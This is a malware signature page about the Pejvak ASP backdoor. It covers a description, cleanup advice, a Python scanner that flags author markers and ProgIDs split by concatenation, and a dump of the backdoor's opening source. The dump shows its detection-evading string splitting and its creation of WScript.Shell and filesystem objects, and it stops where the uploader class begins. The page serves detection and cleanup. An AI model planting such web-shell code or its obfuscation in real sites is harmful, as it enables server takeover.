Malware Signatures

asp.backdoor.pejvak.001

This malware category covers server-side malicious scripts that are commonly used as backdoors. Typical examples are file managers, web shells, tools for bypassing admin login, and single-purpose scripts that let the attacker upload and run other malicious scripts. The payload is ASP based, so it is intended for server-side use and is executed directly on the server when the site is loaded. Only the payload's result (such as a web shell environment) is visible in the browser, not the malicious code itself. Very commonly, backdoors show no visible signs in the site code, and it is impossible to detect them by accessing the infected site from outside. Server-level analysis is necessary in case of infection by this type of malware.
This ASP backdoor was coded by a claimed iTsecteam member called Amin Shokohi (Pejvak), and attackers can use it to upload files, such as other backdoors, defacement pages or illicit content, to the remote server.

Affecting

Any ASP based website, often through vulnerable code or compromised FTP credentials.

Cleanup

Search the files on your server for the author name or its alias (Pejvak). Review the results for any code that was injected inside valid files and remove the malicious content, or the whole file if possible. Since it is an uploader class of malware, you may want to look for other strange files on your server.
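
The search described above can be scripted. The following is an added example, not code from this page or from the signature's vendor: it looks for the author markers and also joins VBScript string pieces, because the dump below splits its COM ProgIDs with an undefined variable (`"W"&byp4ss&"Scr"...`) so that a plain text search for `WScript.Shell` misses them. The extension list, function names and finding labels are assumptions of this example.

```python
import re
import sys
import tempfile
from pathlib import Path

# Assumption: script extensions worth scanning on a classic ASP site.
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx", ".inc"}
# Author name, alias and e-mail handle that appear on this page and in the dump banner.
AUTHOR = re.compile(r"pejvak|pejv4k|amin\s+shokohi", re.I)
# "A" & "B" or "A" & someVar & "B": an undefined VBScript variable is Empty, so the pieces join.
CONCAT = re.compile(r'"\s*&\s*(?:[A-Za-z_]\w*\s*&\s*)?"')
# COM ProgIDs the dump builds this way.
PROGIDS = ("scripting.filesystemobject", "wscript.shell", "wscript.network")

def scan_text(text):
    """Return sorted findings for one file's contents."""
    findings = {"author-marker"} if AUTHOR.search(text) else set()
    raw, joined = text.lower(), CONCAT.sub("", text).lower()
    for progid in PROGIDS:
        # Flag only ProgIDs hidden by concatenation; plain use is common in valid code.
        if progid in joined and progid not in raw:
            findings.add("split-progid:" + progid)
    return sorted(findings)

def scan_tree(root):
    """Map each flagged script under root (relative path) to its findings."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_EXTS:
            found = scan_text(path.read_text(encoding="latin-1"))
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits

def demo():
    """Scan a temporary tree of constructed sample files."""
    samples = {  # constructed; the first line is quoted from the dump on this page
        "x.asp": 'Set wssh = Server.CreateObject("W"&byp4ss&"Scr"&byp4ss&"ipt.Sh"&byp4ss&"ell")',
        "ok.asp": 'Set fso = Server.CreateObject("Scripting.FileSystemObject")',
        "top.inc": "' Coded By Pejvak",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            Path(tmp, name).write_text(body, encoding="latin-1")
        return scan_tree(tmp)

if __name__ == "__main__":
    for name, found in (scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()).items():
        print(name, ", ".join(found))
```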

Dump

<%
'----------------------------------------------------------------------
'       -----------------      Coded By Pejvak       -----------------
'       -----------------       Itsecteam.com        -----------------
'       -----------------  E-mail: pejv4k@yahoo.com  -----------------
'----------------------------------------------------------------------
On Error Resume Next
Set fileso = CreateObject("Script"&byp4ss&"ing.File"&byp4ss&"SystemObject")
dim head,endd,pathn,enddd
 FolderPath = Request.ServerVariables("PAT"&byp4ss&"H_TRANS"&byp4ss&"LATED")
Private Function ParseFolder(PathString)
 Dim liCount
 If Right(PathString, 1) = "\" Then
  ParseFolder = PathString
 Else
  For liCount = Len(PathString) To 1 Step -1
   If Mid(PathString, liCount, 1) = "\" Then
    ParseFolder = Left(PathString, liCount)
    Exit For
   End If
  Next
 End If
End Function
Function getsize(size)
If size>=(1024 * 1024 * 1024)Then getsize=Fix((size /(1024 * 1024 * 1024))* 100)/ 100&"G"
If size>=(1024 * 1024)And size<(1024 * 1024 * 1024)Then getsize=Fix((size /(1024 * 1024))* 100)/ 100&"M"
If size>=1024 And size<(1024 * 1024)Then getsize=Fix((size / 1024)* 100)/ 100&"K"
If size>=0 And size<1024 Then getsize=size&"B"
End Function
Set wssh = Server.CreateObject("W"&byp4ss&"Scr"&byp4ss&"ipt.Sh"&byp4ss&"ell")
Set envinfo = wssh.Environment("SY"&byp4ss&"STEM")
Set wsshn = Server.CreateObject("W"&byp4ss&"Sc"&byp4ss&"ript.Ne"&byp4ss&"twork")
Class FileUploader